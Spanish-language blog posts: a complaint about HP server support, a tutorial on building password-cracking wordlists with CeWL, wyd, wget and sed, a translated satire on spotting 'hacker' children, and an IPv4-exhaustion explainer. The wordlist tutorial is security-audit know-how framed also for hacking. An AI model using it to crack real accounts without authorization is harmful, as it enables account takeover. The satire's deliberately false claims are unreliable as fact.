3. Dado que no tenemos un estimado de tiempo entre bloqueo y bloqueo, podremos correr nuevamente el Insight Diagnostics Offline y correrlo con 20 loops o bucles de manera que el servidor tengo que manejar mucha carga por bastante tiempo y luego enviarnos los resultados.

1. no soy estupido, ya checkee eso.

2. otra vez? cual es el punto? no ve el rigido!!

3. idem

hago el upgrade... nada... hago el diagnostico con 20 loops, todo ok salvo q como era logico no ve el rigido y no lo checkea. mando resultados y me pregunta q dispositivos tengo instalados (recien veia el msg de error parece) y le respondo q "no se le instalo nada, esta como viene de fabrica, debe ser el smart array"... le tengo q decir yo q dispositivos tienen sus equipos... es el colmo!

ademas me pide otro loop de tests (si, otro mas) y un survey completo q es como correr un everest mas o menos. y pasan los dias...

me empieza a llamar x telefono, no se xq ya q hasta ese momento nos comunicabamos perfectamente x correo y alega q no me encuentra y q me deja correos de voz q jamas encuentro, asi pasa mas de una semana desde la apertura del caso hasta q logra llamarme y me pide q resetee la bios y q saque y vuelva a poner la "riser card" q es una placa de expansion q no hace nada ya q en mi caso no tiene nada conectado... ok, lo pruebo.

como es logico no pasa nada, le comunico los resultados y me dicen q me van a enviar una para q yo la cambie... ya mas de 10 dias. no era "servicio al dia siguiente"?

riser card

despues de un par de dias tengo la placa en mis manos, es un componente tan estupido q ni pude encontrar una foto pero es algo parecido a esto:

la cambio, vuelvo a resetear bios... nada, claro. le mando correo al tecnico informando los resultados, me dice q hay q cerrar el caso y abrir otro... ya ibamos mas de 15 dias y mi paciencia se empezaba a agotar. abro un nuevo caso, y van...

el 1er correo q recibo del tec dice asi:

Me podria decir cual sistema operativo esta corriendo en este servidor?

Entre mas detallado mejor, service pack, release y tipo.

otra vez??... ya les puse en todos los casos anteriores el sistema q tenia... "tenia" bien digo xq "no reconoce el rigido!!". es q no miran el historial? aunque sea los ultimos... le respondo resumido:

... El equipo actualmente corre Windows 2003 server x64 sp3, de todas maneras, como te decia el problema viene mucho mas de abajo ya que ni siquiera reconoce la unidad de disco, de manera que tenga el sistema que tenga vamos a estar en el mismo problema...

... Ante la imposibilidad de solucionar el problema por el lado del sistema operativo se migro a plataforma Windows donde el equipo empezo hace unas semanas a mostrar los mismos sintomas de cuelgue con el health led en rojo...

a lo q me responde:

Lo que voy a hacer es comunicarme con los agentes que vieron estos casos y solicitar que pongamos todos los datos juntos, le estare comunicando pronto una resolucion.

y a los tres (3) dias, pasados ya veinte (20) con el server caido, me manda la resolucion de la "junta":

... Creemos que lo mas apropiado es remplazar la tarjeta madre, ya habiendo cambiado el riser solo nos quedaria cambiar la entrada del mismo al sistema que esta en la tarjeta madre.

Se procedera al envio de la misma, para su remplazo se le recuerda tener la tarjeta vieja para el intercambio...

naaaahhhh... ese fue el punto maximo. no tengo problemas en cambiar un capacitor de flujo de delorean si tengo q hacerlo pero se supone q estoy pagando un servicio "al dia siguiente" y despues de 20 dias de vueltas me dicen q me envian el mobo para q lo cambie yo? y encima no me manda ni un procedimiento? xD... de terror!!

perdon... nos equivocamos

ya en este punto, entre otras cosas le contesto:

... Me gustaria tambien saber hasta donde tiene que escalar el problema para que un tecnico de la empresa se acerque al lugar de la incidencia ya que en el CarePack del equipo que tengo en mis manos claramente dice "Soporte de hardware en las instalaciones del cliente"...

... Quien va a pagar el tiempo de productividad perdido?...

... la falla se remonta a unos pocos meses despues de comprado el equipo, momento en el cual se negaron a reconocerlo como problema de hardware...

a lo q me responde:

... En relacion al tipo de contrato que tiene con nosotros me temo que el servidor DL160 G6 con numero de serie XXXXXXXXXX no posee en nuestros registros el tipo de contrato que usted nos menciona, si tiene un numero de contrato o una copia en formato PDF que nos pueda proveer, podemos mandar este caso a validar con una garantia o contrato diferente al que tenemos.

Espero su respuesta para hacer el envio de la parte.

validar? pdf? enviar la parte? para el q no conoce el sistema, al cargar un equipo se lo asocia al carepack correspondiente y ya queda asi para todo. al abrir un caso en el encabezado sale automaticamente el numero de contrato y con un simple click se puede ver todo lo q incluye. todo esta perfectamente categorizado y no hay lugar para equivocaciones... o parece q si. le respondo ya bastante enojado:

... En mi perfil del ITRC de HP puedo ver el CarePack num G0KXXXXXXXX asociado al PN XXXXXX-XXX con SN XXXXXXXXX (adjunto captura) el cual cargue en el momento de crear el usuario hace un año, tambien se ve claramente en el encabezado del caso bajo el campo "Support Service Identifier".

Mi pregunta es, ese contrato cubre o no lo que te mencione anteriormente? Porque lo compramos como que si lo hacia. Si no lo cubre te agradeceria que me lo informaras para tomar las medidas necesarias ya que no puedo estar mas tiempo dando vueltas con el servidor...

ya todo esto copiando a la parte directiva de la empresa xq el problema se estaba yendo de la orbita de IT, estabamos a un paso de tomar acciones legales. me pidieron hacer un resumen del historial del server, armamos una carta formal para HP y fuimos a ver al abogado de la empresa, nos dijo q enviemos la carta y esperemos respuesta durante una semana, si no hay respuesta... carta documento.

mientras tanto me contestan de HP, donde parece q encontraron mi carepack:

... sin embargo el caso fue entitulado a la hora de ser creado de manera incorrecta y el mismo no aparece con el servicio en sitio, cuando si lo posee, para no crear un problema en su servicio, si me lo permite, crearemos un caso nuevo en el cual pondremos todo el historial del mismo y se le enviara el ingeniero con la parte a remplazar...

"entitulado de manera incorrecta?"... donde? si en el "entitulado" veo perfectamente el num del care pack? ya no saben q decir... HP!! q verguenza!! le respondo:

Adjunto capturas del 1er y ultimo casos de mi perfil, en los cuales se puede ver claramente el num de CarePack asociado con el equipo. No termino de comprender donde esta el "entitulado de manera incorrecta" ya que obviamente esta ahi y que en las caracteristicas del mismo sin dudas dice "onsite support" (captura enviada ayer). Todos estos datos son de su propio sistema...

... Crea el nuevo caso o hace lo que haga falta para que alguien venga cuanto antes a hacer el arreglo...

ni me contesto, cerro el caso y abrio otro... si, otro mas... envio de parte, actividades pendientes, parte en transito, siguen pasando los dias hasta q la parte llega a argentina y me contacta un tecnico local diciendome q tiene el mobo para reemplazar.

el fin de la pesadilla?

en ese momento parecia q todo se iba arreglar... hasta entonces hablaba solamente con gente de costa rica, HP paso el soporte alla ya q obviamente es mas barato. lo q no calcularon son los problemas q todo esto trae en cuanto a tiempos de respuesta, atencion, comunicacion, etc. cuando el soporte lo daban aca mismo la atencion era muy distinta. no tengo nada contra la gente de costa rica pero es obvio q esto pasa con todos los servicios q se manejan asi... en la distancia la cosa es distinta.

en HP argentina se deshacian en disculpas x lo ocurrido y enseguida vino el tecnico a hacer el reemplazo. mas alla de detalles, lo cambio, siguio la misma falla y despues de horas de pruebas llegamos a la conclusion de q el problema no era eso sino simplemente el famoso "smart array" q estaba fallando. no quedaba otra q sentarse a esperar la placa, dado q despues de un mes los "craneos" q se juntaron habian dado un diagnostico erroneo, pero claro... siempre lo mas facil... cambia el mobo, hace upgrade de bios... hacete 500 loops, tomate 2 aspirinas y volve la semana q viene...

al mes y una semana vuelve el tecnico con la placa, la cambia y el equipo como nuevo. casi un año de problemas x una simple controladora de disco q vino mal de fabrica. bah... "de fabrica" mas bien refurbished igual q el mobo q me pusieron y la "riser card" q me mandaron... igual q ahora estaran poniendo la q mande yo en algun DL160 en algun lugar del 3er mundo... en fin, eso es otro tema.

mucha disculpa pero nadie me ofrecio nada en compensacion, ni siquiera lo logico q seria una extension del carepack x el año q perdi sin respuesta. tampoco lo pedi en realidad, en estos casos lo mejor es sacartelos de encima. el proximo server q tenga q comprar pueden estar seguros q no va a ser HP... y no xq este disconforme en particular con sus equipos, sino xq la atencion fue por mucho la peor q recibi en mi vida x un servicio pago.

como obtener las mejores wordlists (diccionarios)

2011-02-08T16:43:00.004-03:00

es muy comun en las auditorias de seguridad (y x supuesto en el hacking) el uso de wordlists (o diccionarios) para buscar claves debiles en un sistema. el procedimiento de crackeo de la clave es simple, se utiliza alguna herramienta, segun el caso, q vaya probando passwords hasta dar con la correcta.

en el caso de claves online la historia es mas complicada ya que se utilizan sistemas para blockear al atacante cada X numero de intentos. en los servidores q administro x ej suelo instalar fail2ban q hace muy bien el trabajo, se puede configurar numero de intentos, tiempo del ban, envio de correo con el log y whois del ataque, etc.

la idea entonces es hacerse con la clave encriptada (hash) para despues crackearla tranquilo en la comodidad de nuestros hogares. la manera de obtener el hash tanto como el proceso de crackeo es algo a lo q no me voy a referir ya que esta entrada es sobre otro tema (y depende del caso especifico), pero se supone q si estan buscando wordlists ya saben para q las quieren y tendran su john the ripper (o el q sea) preparado.

tipos de crackeo

hay varios formas de intentar crackear 1 hash pero el tiempo depende de varios factores, la velocidad de procesamiento del sistema es muy importante pero tambien el tipo de encriptacion q tiene el hash, al aumentar la complejidad del algoritmo obviamente aumenta el tiempo del proceso.

se puede ver mucho x ahi gente pidiendo "wordlists para ataque de fuerza bruta", eso es en realidad un error de concepto, no xq no se pueda hacer sino porque son 2 cosas distintas. 1 ataque x fuerza bruta es el que va probando todas las combinaciones hasta dar con la correcta, dentro de esta posibilidad tenemos q fijarnos en los tipos de caracteres q puede incluir la password (mayusculas, minusculas, signos de puntuacion y numeros). supongamos q simplemente buscaramos letras minusculas el sistema iria probando todo el abecedario y luego:

ac... hasta az y despues:

bc...

y asi sucesivamente hasta completar los campos q le hayamos indicado, si fueran 8 llegaria hasta "zzzzzzzz".

esto obviamente lleva muchisimo tiempo, dependiendo de la extension de la password y la complejidad del algoritmo tal vez... para siempre... je

pero como somos seres humanos y a la mayoria le cuesta recordar secuencias de caracteres sin sentido, un gran porcentaje de los usuarios utiliza passwords que son simples palabras q se pueden encontrar en 1 diccionario. en este punto es donde entran en juego las wordlists. seguramente no van a crackear la pass del server de la nasa con 1 wordlist pero para cuentas de users normales suelen funcionar bastante bien si se usa la correcta.

con el diccionario solamente probamos las palabras q se encuentran en el, sin perder tiempo en secuencias sin sentido y ahorrando de esta forma muchisimo tiempo de proceso. el tema es q la palabra este en la lista, sino x supuesto q no vamos a obtener ningun resultado.

creando wordlists

la mejor opcion entonces es crear nuestra propia wordlist basados en las necesidades de cada caso. es importante la ingenieria social, investigar al objetivo para tener 1 idea de lo q puede poner como pass, usar nombres de productos si se trata de 1 empresa q fabrica algo, constelaciones si son astronomos, drogas si son quimicos, nombres de equipos y jugadores si esta relacionado con algun deporte, etc.

los otros dias necesitaba una lista especifica, nombres permitidos en argentina... en la red se pueden encontrar muchas wordlists especificas y generales en todos los idiomas (la mayoria en ingles), pero es imposible encontrar algo tan especifico como lo q buscaba asi q no me quedo otra q hacermela yo mismo.

la informacion se encuentra facilmente en google (en el reg civil x ej) pero no en forma de lista, y copiar y pegar es practicamente imposible. me disponia a usar metodos prehistoricos con wget y algun script para manipular los datos, cuando me encontre con 1 interesante utilidad q automatiza el trabajo.

voy a explicar los 2 metodos, xq aunque al final termine usando el viejo y fiel wget me gusto el programita. se llama:

CeWL (se pronuncia cool)

se puede descargar de aca:

http://www.digininja.org/files/cewl_3.0.tar.bz2

y la pagina con instrucciones (en ingles) aca:

http://www.digininja.org/projects/cewl.php

basicamente hay q tener instalado ruby y las siguientes gems:

hpricot

http_configuration

mime-types

mini_exiftool

rubyzip

spider

se instalan con:

gem install nombredelgem

y hay q setear la variable RUBYOPT con el valor rubygems:

export RUBYOPT=rubygems

no esta en las instrucciones pero tuve q intalar tambien la libreria "libimage-exiftool-perl", xq me daba un error. para otros errores fijense en la pagina. el help de cewl devuelve:

$ ./cewl.rb --help

cewl 3.0 Robin Wood (dninja@gmail.com) (www.digininja.org)

Usage: cewl [OPTION] ... URL

--help, -h: show help

--depth x, -d x: depth to spider to, default 2

--min_word_length, -m: minimum word length, default 3

--offsite, -o: let the spider visit other sites

--write, -w file: write the output to the file

--ua, -u user-agent: useragent to send

--no-words, -n: don't output the wordlist

--meta, -a file: include meta data, optional output file

--email, -e file: include email addresses, optional output file

--meta-temp-dir directory: the temporary directory used by exiftool when parsing files, default /tmp

-v: verbose

URL: The site to spider.

el uso es bastante simple supongamos q queremos descargar el contenido de "www.yahoo.com" en el archivo "lista", pondriamos:

./cewl.rb -w lista www.yahoo.com

con el resto de las opciones se pueden hacer cosas bastante interesantes como setear un minimo de caracteres, la cantidad de links, etc... cosa de experimentar 1 poco...

con el viejo wget ;)

con wget y 1 sencillo script a medida podemos obtener los mismos resultados, como el script depende de lo q quieran hacer solamente voy a nombrar los comandos de manipulacion para q cada uno los use como quiera.

para descargar la pagina con wget:

wget -r -l 1 -nd paginaadescargar

"-r" descarga recursivamente la pagina, "-l" especifica el nivel de profundidad y "-nd" q no se creen los directorios. con esto obtenemos los archivos q componen la pagina, seleccionamos lo q nos interesa y procedemos a extraer el contenido y ordenarlo 1 poco, para eso vamos a usar wyd q es 1 script en perl q se puede descargar desde aca:

http://www.remote-exploit.org/wp-content/uploads/2010/01/wyd-0.2.tar.gz

simplemente lo descomprimimos y lo ejecutamos. el help:

$ ./wyd.pl --help

* ./wyd.pl 0.2 by Max Moser and Martin J. Muench

Unknown option: help

Usage: ./wyd.pl [OPTIONS]

Options:

-o = Write wordlist to

-t = Separate wordlist files by type, e.g. '.doc'

-s = Use 'strings' for unsupported files

-b = Disable removal of non-alpha chars at beginning of word

-e = Disable removal of non-alpha chars at end of word

-f = Disable inclusion of filenames in wordlist

-v = Show debug / verbose output

-n = Continue even if programs / modules are missing

suponiendo q tenemos el contenido q descargamos en el directorio download/ tendriamos q ingresar:

./wyd.pl -n -o nombredelarchivoagenerar.txt download/

con esto ya tenemos una lista con todas las palabras q estaban en las paginas q descargamos, solo hay q limpiarla y ordenarla 1 poco, para esto nos sobra con los comandos de manejo de cadenas q trae bash. vamos a ver lo mas basico....

ordenando las listas

empecemos x ordenar alfabeticamente:

sort -d lista > listaordenada

borrar entradas repetidas:

uniq listaordenada > listaunica

ya tenemos una lista ordenada alfabeticamente y sin palabras repetidas ("listaunica"). muchas veces aparece el problema de palabras q quedan con algun caracter pegado al principio o al final o cadenas q queremos remover xq contienen algun caracter raro o lo q sea, para eso usamos sed (StreamEDitor)... el help de sed:

$sed --help

Usage: sed [OPTION]... {script-only-if-no-other-script} [input-file]...

-n, --quiet, --silent

suppress automatic printing of pattern space

-e script, --expression=script

add the script to the commands to be executed

-f script-file, --file=script-file

add the contents of script-file to the commands to be executed

-i[SUFFIX], --in-place[=SUFFIX]

edit files in place (makes backup if extension supplied)

-l N, --line-length=N

specify the desired line-wrap length for the `l' command

--posix

disable all GNU extensions.

-r, --regexp-extended

use extended regular expressions in the script.

-s, --separate

consider files as separate rather than as a single continuous

long stream.

-u, --unbuffered

load minimal amounts of data from the input files and flush

the output buffers more often

--help display this help and exit

--version output version information and exit

If no -e, --expression, -f, or --file option is given, then the first

non-option argument is taken as the sed script to interpret. All

remaining arguments are names of input files; if no input files are

specified, then the standard input is read.

E-mail bug reports to: bonzini@gnu.org .

Be sure to include the word ``sed'' somewhere in the ``Subject:'' field.

esto es 1 poco mas dificil de manejar pero se deja... para remover un caracter al principio de la palabra:

sed 's/^[caracter]//' -i lista.txt

al final:

sed 's/[caracter]$//' -i lista.txt

para borrar lineas conteniendo X caracter:

sed '/caracter/d' -i lista.txt

y asi podemos hacer infinidad de cosas con nuestras cadenas, si x ejemplo queremos extraer las palabras q empiecen con la letra "m" y continuen con cualquier caracter entre la "d" y la "j" usamos grep con el modificador "-w":

grep -w 'm[d-j]*' .txt

todo esto lo podemos combinar en 1 sola linea:

./wyd.pl -n pages | grep -w 'm[d-j]*' | sort -d | uniq > lista.txt

o si son muchas algun script q simplifique para no tener q andar cambiando variables todo el tiempo en la consola.

solamente queda cargarlas en su programa de cracking favorito y probarlas...

como saber si su hijo es un hacker.

2011-01-10T18:49:00.017-03:00

me tome el trabajo de hacer 1 traduccion literal de este texto ya q las q andan x ahi son versiones adaptadas al publico español y la verdad q se pierde bastante en muchos puntos, ademas de inventar algunos y olvidarse otros tantos.

el original fue publicado en diciembre de 2001 x T. Reginald Gibbons aca:

Is Your Son a Computer Hacker?

su hijo es 1 hacker informatico?

como padre moderno e informado, trato de estar tan envuelto como me es posible en las vidas de mis seis hijos. los aliento a unirse a equipos deportivos. mantengo un ojo paternal en los CDs q escuchan y los shows que van a ver, la editora a la que pertenecen los libros q leen. Se podria decir que soy 1 padre modelo. mis hijos nunca han dejado de hacerme sentir orgulloso, y puedo decir sin ninguna duda q tengo la mejor flia en USA.

hace 2 años, mi esposa carol y yo decidimos q la educacion de nuestros hijos no estaria completa sin alguna preparacion basica en computadoras modernas. con este fin, les compramos una nueva compaq con la q aprender. los niños se divirtieron mucho usando los programas de aplicacion q compramos, como adobe photoshop y microsoft's word, y mi esposa y yo nos vimos complacidos de q nuestro regalo fuera tan bien recibido. nuestro hijo peter fue el mas absorvido x el dispositivo, y se volvio casi un profesional surfeando la red. cuando peter comenzo a pasar dias enteros en la maquina, me preocupe, pero carol me recomendo q me calmara, q solo era una fase pasajera. Confie es sus instintos maternales, hasta q nuestra hija menor, cindy, entro al living 1 noche gritando: "PETER ES 1 HACKER!"

como podran imaginar, estaba sorprendido. 1 hacker en mi propia casa! comence a monitorear los habitos de mi hijo, para estar seguro de q cindy no estuviera simplemente inventando historias, como es propensa a hacer algunas veces.

despues de unos pocos dias de investigacion, y algo de estudio en hacking, confronte a peter con la evidencia. temo decir, q esta fue la unica vez q estuve realmente decepcionado de 1 de mis hijos. Los criamos para ser honestos y tener integridad, y peter traiciono los principios q tratamos de inculcarle, cuando se rehuso a admitir sus actividades. Sus negaciones continuaron x horas, y al final, no me quedo otra opcion q prohibirle usar la computadora hasta ser lo suficientemente grande para ser responsable x sus actos.

despues de atravesar esta prueba con mi propia familia, estuve pensando la mejor manera de ayudar a otros en situacion similar. obtuve un monton de conocimiento sobre hackers en esos pocos dias. es justo que provea de esa informacion a otros padres, con la esperanza de q ellos puedan saber si sus hijos estan metidos dentro del mundo del hacking. tal vez otros padres puedan dirigir a sus hijos de regreso x el camino recto antes q medidas extremas deban ser empleadas.

con este fin, decidi publicar el top ten de las señales de que su hijo es 1 hacker. recomiendo a todos los padres leer esta lista cuidadosamente y si su hijo coincide con el perfil, deben tomar alguna accion. 1 padre inteligente tratara primero de razonar con su hijo, antes de recurrir a castigos o hasta palizas. Me enorgullezco de nunca golpear a 1 niño, y espero q esta guia ayude a otros padres a detener la mala conducta de sus hijos antes q 1 paliza se vuelva necesaria.

1. le ha pedido se hijo cambiar de ISP?

la mayoria de las familias americanas usa proveedores de internet responsables y de confianza, como AOL. estos proveedores tienen estrictas politicas de "no hacking", y toman cuidadosas medidas para asegurarse de q tenga 1 agradable experiencia en internet, educativa y sobre todo legal. si su hijo esta convirtiendose en hacker, 1 de sus primeros pasos sera pedir el cambio a algun proveedor mas "amigable" con los hackers.

recomiendo a todos los padres q se nieguen a este pedido. 1 de las razones x la q su hijo esta interesado en cambiar de proveedor es para deshacerse del filtro de proteccion infantil de AOL. este filtro es vital para cualquier padre q desee q su hijo disfrute de internet sin ponerlo en peligro de la exposicion a contenido "adulto". es mejor poner la proteccion q AOL provee, en lugar de usar alguna solucion hogareña. si su hijo se esta convirtiendo en hacker, sera capaz de evitar cualquier medida "hogareña" con sorprendente facilidad, usando informacion obtenida de varios sitios hacker.

2. encuentra programas en su computadora q no recuerda haber instalado?

su hijo probablemente intentara instalar algun software de hackers. tratara de ocultar su presencia de alguna manera, pero ud puede normalmente encontrar todos los nuevos programas viendo la lista de programas en "agregar y quitar programas" en su panel de control. Algunos programas hacker populares son "Comet Cursor", "Bonzi Buddy" y "Flash".

la mejor opcion es confrontar a su hijo con la evidencia, y forzarlo a remover los programas ofensivos. probablemente intentara instalar el software nuevamente, pero ud sera capaz de saber cuando esto suceda, si su maquina le ofrece "descargar" alguna de las aplicaciones hacker. si esto sucede, es tiempo de tener una severa charla con su hijo, y posiblemente considerar algun castigo.

3. su hijo le ha pedido nuevo hardware?

los hackers informaticos se ven frecuentemente limitados x el hardware convencional. ellos pediran placas de video "mas rapidas", y discos rigidos con mayor capacidad, o hasta mas memoria. pero si su hijo comienza a pedirle estos dispositivos, es posible q tenga 1 necesidad legitima. lo mejor q puede hacer es comprar hardware confiable y legal haciendolo solo al fabricante de su computadora.

si su hijo le pide 1 nuevo procesador de una compañia llamada "AMD", es 1 genuina causa de alarma. AMD es 1 empresa del 3er mundo que hace copias inferiores de chips de procesadores americanos. usan mano de obra de niños en sus talleres tercermundistas, y deliberadamente desactivan caracteristicas de seguridad q los fabricantes de procesadores americanos, como intel, usan para prevenir el hacking. los chips AMD nunca son vendidos en tiendas, y seguramente se le pedira q lo ordene a traves de sitios de internet. no compre este chip! este es 1 pedido q debe rehusar a su hijo, si tiene alguna esperanza de criarlo bien.

4. su hijo lee manuales de hacking?

si presta bastante atencion a los habitos de lectura de su hijo, como yo hago, sera capaz de determinar la mayor parte de sus opiniones y hobbies. los niños son mas impresionables en su adolescencia. cualquier padre q haya sufrido el intento de su hija de 17 años de escabullirse a 1 cita, perfumada y maquillada, es consciente del efecto q las influencias impropias pueden causar en mentes inexperimentadas.

hay, infortunadamente, muchos manuales de hacking disponibles en las librerias hoy dia. unos pocos titulos para tener bajo mirada son: "snow crash" y "cryptonomicon" de neal stephenson, "neuromancer" de william gibson, "programming with perl" de timothy o'reilly, "geeks" de jon katz, "the hacker crackdown" de bruce sterling, "microserfs" de douglas coupland, "hackers" de steven levy, y "the cathedral and the bazaar" de eric s. raymond.

si encuentra alguno de estos manuales de hacking en posesion de sus hijos, confisquelos inmediatamente. puede ademas pedir a los proveedores locales de libros q remuevan estos titulos de sus estanterias. puede encontrarse con alguna resistencia al principio, pero hasta los vendedores de libros deben someterse a las presiones de la comunidad.

5. cuanto tiempo x dia pasa su hijo usando la computadora?

si su hijo pasa mas de 30 minutos x dia en la computadora, puede estar usando DOS contra paginas de otras personas. DOSear implica ganar acceso al "command prompt" (la consola) de otras maquinas, y usarlas para blockear servicios vitales de internet. esto puede tomar mas de 8 horas. si su hijo esta haciendo esto, esta rompiendo la ley, y debe detenerlo inmediatamente. la politica mas segura es limitar el acceso de sus hijos a la computadora a 1 maximo de 45 minutos x dia.

6. su hijo juega quake?

quake es 1 realidad virtual online usada por los hackers. es 1 lugar popular para encontrarse y entrenarse, donde ellos discuten sobre hacking y se entrenan en el uso de numerosas armas de fuego. muchos hackers desarrollan tendencias antisociales debido al uso de este mundo virtual, y pueden sufrir comportamiento erratico en el hogar o la escuela.

si su hijo usa quake, debe hacerle entender q esto no es aceptable para ud. debe asegurarse q todas las armas de fuego en su casa esten bien guardadas, y tener los seguros de gatillo activados. tambien debe preocuparse x la atencion en la escuela.

7. su hijo se esta volviendo discutidor y hosco?

a medida q los adolescentes ingresan al electronico mundo del hacking, comienzan a desconectarse del mundo real. pierden la habilidad de controlar sus actos, o juzgar lo bueno o malo de un comportamiento. esto se manifestara pronto en la forma q trata a los demas. aquello con lo que disienta lo hara con desprecio, amargura y hasta lenguaje vulgar. proferira amenazas de violencia de naturaleza real o electronica.

aun cuando sea confrontado, probablemente su hijo encuentre dificultad para hablar sobre este problema con ud. probablemente dira q no hay problema, y q esta imaginando cosas. le dira q es ud quien tiene el problema, y q debe "dejarlo solo" y "dejar de molestarlo". no se deje engañar. ud es la unica chance q tiene su hijo, aun si no entiende la situacion en la q esta. siga intentando llegar a el, no importa cuanto se refugie en si mismo.

8. esta su hijo obsesionado con "Lunix"?

BSD, Lunix, Debian y Mandrake son todas versiones de un sistema de operacion ilegal hacker, inventado por un hacker sovietico llamado linyos torovoltos, despues q los rusos perdieran la guerra fria. esta basado en 1 programa llamado "xenix", q fue escrito x microsoft para el gobierno de usa. estos programas son usados x hackers para entrar en las computadoras de otras personas y robar numeros de tarjetas de credito. ademas puede ser usado para entrar en los stereos ajenos para robar su musica, usando el programa "mp3". torovoltos es 1 conocido hacker, responsable de escribir muchos programas hacker, como "telnet", q es usado por los hackers para conectar a otras maquinas en internet sin usar el telefono.

su hijo puede intentar instalar "lunix" en su disco rigido. si el es cuidadoso, ud no notara su presencia, sin embargo, lunix es 1 bestia caprichosa, y si lo maneja incorrectamente, su hijo puede dañar su computadora, y hasta romperla completamente borrando windows, a este punto su computadora debera ser reparada x 1 profesional.

si ud ve la palabra "LILO" durante el arranque de windows (justo despues d encender la maquina), su hijo ha instalado lunix. para deshacerse de el, debe enviar su computadora de vuelta al fabricante, y hacer q le instalen 1 nuevo disco duro. lunix es 1 software extremadamente peligroso, y no puede ser removido sin destruir parte de la superficie de su disco.

9. ha cambiado su hijo su apariencia radicalmente?

si su hijo ha sido objeto de 1 repentino cambio en su estilo de vestir, ud puede tener 1 hacker en sus manos. los hackers tienden a vestirse con colores vivos, fluo. pueden vestir pantalones baggy, remeras con colores brillantes y pelo en punta con colores vivos para hacer juego con sus ropas. pueden llevar glow sticks y algunos llevan chupetes colgando de su cuello. (no tengo idea xq hacen esto). hay muchos de estos hackers en las escuelas hoy en dia, y su hijo puede estar comenzando a asociarse con ellos. si ud nota q el grupo de amigos de su hijo incluye gente vestida de tal manera, es hora de pensar en 1 severo toque de queda, para protegerlo de peligrosas influencias.

10. esta su hijo teniendo dificultades en la escuela?

si su hijo se lleva materias en la escuela, o tiene notas bajas en deportes, puede estar involucrado en algun grupo de hacking, tal como la infame asociacion hacker "otaku". excesivo tiempo desperdiciado en la computadora, comunicandose con sus amigos hackers puede causar daño temporal a los ojos y el cerebro, a causa de la radiacion electromagnetica. esto causara q sus notas desciendan dramaticamente, particularmente en asignaturas dificiles como matematicas y quimica. en casos extremos, la sobreexposicion a la radiacion de la computadora puede causar esquizofrenia, meningitis y otras enfermedades psicologicas. ademas, la reduccion de ejercicio puede causar que pierda masa muscular, y hasta empezar a ganar peso. por el bien de la salud psiquica y mental de su hijo, debe ponerle 1 alto a su hacking, y limitar el tiempo q pasa con la computadora drasticamente.

aliento a todos los padres a leer esta guia cuidadosamente. el futuro de sus hijos depende de esto. el hacking es 1 actividad ilegal y peligrosa, q puede enviar a su hijo a la carcel, y destrozar su familia. esto no debe tomarse demasiado en serio.

ARPAgeddon IPcalipsis o como lo quieran llamar. Se acaba el espacio en Internet?

2010-12-05T01:07:00.001-03:00

hace rato q se habla de este tema pero siempre parecio q nunca llegaria el dia o q alguien iba a hacer algo antes de que llegara, lo cierto es que ya no quedan muchas direcciones para asignar, a este ritmo es cuestion de dias para q se acaben. en el contador de la izquierda se puede ver al ritmo q bajan y lo poco q queda disponible...

por supuesto la mayoria de los "mortales" no entiende mucho cual es el problema o si en realidad hay un problema o es otra estupidez como el y2k.

pero no, esto va a tener consecuencias... buenas y/o malas...

que es una IP?

la sigla IP (Internet Protocol) se refiere al protocolo de comunicacion principal usado en internet. para q esto funcione cada maquina (o dispositivo) debe tener una direccion (direccion IP) que es unica dentro de la red, no puede haber 2 IPs iguales ya que esto genera un error inmediatamente. digamos q es como la direccion de nuestra casa, o el numero de documento de identidad o como se llame la identificacion q usen en su pais... un numero unico.

la version q usamos desde hace casi 30 años es IPv4, en la cual este numero tiene una longitud de 32 bits, dividido en 4 segmentos de 8 bits. en decimal una tipica IP puede ser:

200.43.65.23

cada uno de los campos lo comprende un numero entre 0 y 255 o sea q la cuenta es facil 256^4 (o 2^32 binario) lo cual nos da un total de 4.294.967.296 IPs posibles. a esto le tenemos q restar unos 18 millones reservados para redes privadas y otros 270 millones para multicast.

quien asigna y quien reparte las IPs

a nosotros (el usuario final) nos da la IP nuestro proveedor de internet q tiene un numero limitado de ellas, cuando se le acaban y necesita mas las pide al RIR (Regional Internet Registrie) q le corresponde, en nuestra region esta LACNIC q cubre latinoamerica y el caribe. Existen otros 4 que son ARIN (norteamerica), AfriNIC (africa), APNIC (asia y pacifico), RIPE NCC (europa, medio este y asia central).

cuando estos necesitan mas IPs se las piden al IANA (Internet Assigned Numbers Authority), al cual le quedan las q vemos en el contador... teniendo en cuenta q la demanda actual es de unos 200 millones al año parece q estamos en 1 problema... je

de todas formas se calcula q los RIRs y los ISPs (Internet Service Provider) tienen mas de 400 millones guardadas... lo cual nos da unos 2 años mas hasta que se acaben de verdad.

celulares, 3g, 4g y toda esa porqueria

gran culpa de todo esto la tienen la gran cantidad de porquerias q ahora conectan a internet sin mucho sentido, tenemos millones de celulares, ipads y otros engendros conectando para actualizar perfiles de facebook, dejar comentarios estupidos en twitter, estar al tanto de la temperatura o ver videitos en youtube.

no seria mejor haberse planteado la real necesidad de darle una IP publica a cada uno antes de saturar todo? para q m... quiere una IP unica un telefono movil? alguien necesitaba correr un server de correo o un FTP desde el celu?

bastante mal uso hacen ya de las IPs con las conexiones hogareñas... estabamos tan tranquilos hace solo 10 años... en fin... todo sea x el "progreso" de la red...

la solucion... IPv6

IPv6 es la nueva version del Internet Protocol diseñada para usar direcciones de 128 bits en lugar de 32 lo cual nos da un limite de 2^128 o sea:

340.282.366.920.938.463.463.374.607.431.768.211.456

las direcciones IPv6 estan compuestas, a diferencia de las v4, por 8 campos de 16 bits cada uno, el numero maximo seria:

FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF (el decimal de arriba)

de estos los 1eros 64 corresponden al prefijo de red y los ultimos al identificador de la interfaz q se genera a partir de la MAC address del dispositivo conectado.

los sistemas operativos ya tienen soporte para el nuevo protocolo hace años, el tema es q la mayoria del hardware de redes de alto nivel debe ser cambiado, incluyendo tambien la mayoria de los switches hogareños. ademas de q la transicion no se puede hacer de un dia para el otro, estamos hablando de un par de años como para hacerlo de manera q no cause demasiados transtornos, habra un largo periodo en el cual conviviran ambos protocolos hasta que el 4 vaya desapareciendo poco a poco... pero deberiamos empezar ya...

especulacion?

q pasaria en 1 escenario donde no haya mas IPs? hay muchos ISPs chicos q ya usan NAT (Network Address Translation) para sacar montones de usuarios con una misma IP, como decia al principio para la mayoria de los "mortales" esto es lo mismo... hasta q quieren bajar alguna pelicula desde una pagina de descargas y les sale el tipico:

Your IP address xx.xx.xx.xx is already downloading a file. Please wait until the download is completed.

